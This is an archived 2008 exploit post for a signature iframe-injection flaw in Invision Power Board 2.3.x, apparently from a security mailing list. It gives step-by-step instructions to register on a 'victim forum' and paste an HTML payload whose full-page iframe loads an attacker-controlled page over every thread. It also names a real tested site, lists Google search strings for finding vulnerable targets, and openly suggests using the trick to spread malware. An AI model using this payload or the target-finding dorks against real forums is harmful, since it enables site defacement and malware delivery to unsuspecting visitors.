Invision Power Board <=2.3.x iFrame Vuln Mar 26 2008 04:19PM
shaheemirza gmail com
#######################################################

Tested On: http://www.abarjigs.com/forum/

Effected on:Invision Power Board <=2.3.x

Type:Signature With iFrame

Discovered By:CYBER.DARK.HIMU (SHAHEE_MIRZA)

Google: "style designed by Soi" or "Powered by IP.Board 2.3.1"

Mail: cyber.dark.himu (at) gmail (dot) com [email concealed],shaheemirza (at) gmail (dot) com [email concealed]

#######################################################

HI TO ALL.

HOW TO USE THIS VULN?

ANSWERE IS BELOW>>>>>>>

1.REG WITH VICTIM FORUM

2.GO TO USER CONTROL PANEL

3.EDIT YOUR SIGNATURE ByTHIS CODE

Code: Select all

<html>

<head>

<title>HACKED BY YOUR-NAME</title>

</head>

<body>

<div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0">

<iframe name="iFrame1" width=1024 height=3186 src="http://YOUR-SITE/YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe>

</div>

</body>

</html>

4.AFTER THAT U WILL SEE ALL THE PAGE IS COVERED BY YOUR PAGE

5.GO ANY TOPIC AND POST ANYTHING.

6.AFTER THAT SEE "THE BOOM"

##########################################################

######U CAN USE IT FOR SPREADING MALWARE#################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus